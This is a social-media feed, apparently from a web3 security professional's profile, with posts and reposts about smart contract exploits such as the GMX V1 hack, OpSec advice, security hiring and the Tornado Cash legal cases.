Joe | Audit Wizard
@joe_vanloon
Professional security wizard, building @audit_wizard, making audits great again - previously worked @apple
⏳ Final push next week. Our lawyers and experts are working around the clock — we’ve forgotten what normal sleep feels like. Every hour counts, and so do the costs. If you believe in fairness, open-source, and freedom, please help us finish strong. 🙏 👉…
Ethereum core developer @preston_vanloon took the stand to testify in the defense of @rstormsf This is why I love Ethereum - ETH is being built with a vicious commitment to values and freedom. Rainbows and unicorns in the front, but claws and teeth in the back.
Hacks aren't just from vulnerable code. They happen because people use personal laptops for work, because a new dev hire was infected by malware, or because multi-sig ops were not perfect. We decided it was time to fix this, so we built Sentry, a platform that secures your OpSec
Cooking up the design for our new Blogs page on Web3SecNews with @navdeep1840 that too contributor-friendly, so anyone can write, publish under their name, and help others stay sharp on the latest in web3 security and OpSec. DM if you’d like to collab and write articles!!! PS:…
Another wild twist. Cross-contract reentrancy! Does anyone remember that Vyper bug that allowed cross-function reentrancy when using the built-in guard? Auditors should always verify the mutex scope when you see the 'nonReentrant' modifier, it can be deceptive 🧙♂️
x.com/i/article/1943…
Good message. The unfortunate truth is that attackers very rarely return the money once they have stolen it. You have to hope it was just a dumb kid who is now scared and not DPRK agents who will never give a shit. Great to see GMX's huge bug bounty budget, though. What chads 💪
Posting this message in hopes of connecting with the individual responsible for the GMX V1 exploit. You've successfully executed the exploit; your abilities in doing so are evident to anyone looking into the exploit transactions. The white-hat bug bounty of $5 million continues…
Wow, this is so wild and really demonstrates the importance of redundant data sources and invariant monitoring. Pretty spooky stuff to learn that a core piece of infra is vulnerable like this.
It gets even more fancy: the way Etherscan was tricked showing the wrong implementation contract is based on setting 2 different proxy slots in the same frontrunning tx. So Etherscan uses a certain heuristic that incorporates different storage slots to retrieve the implementation…
Roman Storm's trial starts in 5 days. Just like my lawsuit against the OFAC sanctions, Roman is fighting for our fundamental right to financial privacy. Unlike me, however, he is also fighting for his life. I wish him all the best and hope he emerges as a free man 💜
Sad to see an organization that I know takes security very seriously getting hacked like this. I guess the takeaway from this is that hacks are not necessarily an if but a when, and preventative measures like on-chain firewalls should be a requirement for preparing for that day.
The GLP pool of GMX V1 on Arbitrum has experienced an exploit. Approximately $40M in tokens has been transferred from the GLP pool to an unknown wallet. Security has always been a core priority for GMX, with the GMX smart contracts undergoing numerous audits from top security…
Sorry, how is this a "standard" if it isn't accessible to anyone else? Publish the framework or call this what it is, a closed-source marketing gimmick.
Institutions need a way to evaluate DeFi risk. Organizations need a path to institutional adoption. Introducing the Web3SOC, the framework that evaluates security, governance, financial resilience, and compliance.
Web3 security has grown beyond just on-chain hacks. Now, orgs are faced with ever-evolving threats targeting web2 and OpSec attack vectors, and we must evolve to combat them. We've frustratingly seen many organizations fall victim to easily preventable compromises (large…
Wake up babe, new web3 phishing training just dropped. We need more initiatives like this or OpSec compromises will continue to plague our industry. I think there is some work to be done to make this more accessible to organizations (35 challenges is a lot), but this is a start.
🔥Unphishable project we've been working on for the past few months is officially launching. Unphishable 正式上線! 🚀 Big shoutout to @SlowMist_Team @realScamSniffer and @DeFiHackLabs @EF_ESP @Geodework @GoPlusSecurity for the strong support!
It can happen to the best of us. Security is hard to do perfectly, it is a constant tug-of-war between security priorities and business needs. The takeaway here is to elect a security champion to keep track of your risks and be a constant thorn in your side until you fix them 🔐
A Chain Is Only as Strong as Its Weakest Link: Learning from Our Security Incident Over the past weekend, our team at $HAI has been grappling with a security incident stemming from an outdated piece of our infrastructure. The situation is ironic, given our role in security,…
Radar 🔴 A static analysis tool for anchor rust programs by Auditware. Another great tool for the Solana/Rust CI pipeline 🚀 github.com/Auditware/radar
After the 5th Cir. ruled against the government in November, it repeatedly tried to avoid entry of a final judgment in the Tornado Cash case. It asked the Court TWICE for long delays before claiming the case was moot (with no final judgment needed) b/c they had chosen to remove…
Happy to share that we're expanding our internal Web2 security team! If you're excited about securing the entire application stack for a new global economy shoot me a DM!
Web2 security engineers — we want you. Guardian is building a new internal team and hiring security engineers with deep expertise in infrastructure, frontend, and OpSec. If you're ready to help set a new standard in security, let's talk. DMs open 👀
Power does not recede voluntarily. It's gasps and it gasps until it no longer can. @USTreasury filed yet another late Friday pleading against Tornado Cash. After grudgingly delisting TC, they now claim they've mooted any need for a final court judgment. But that's not the law,…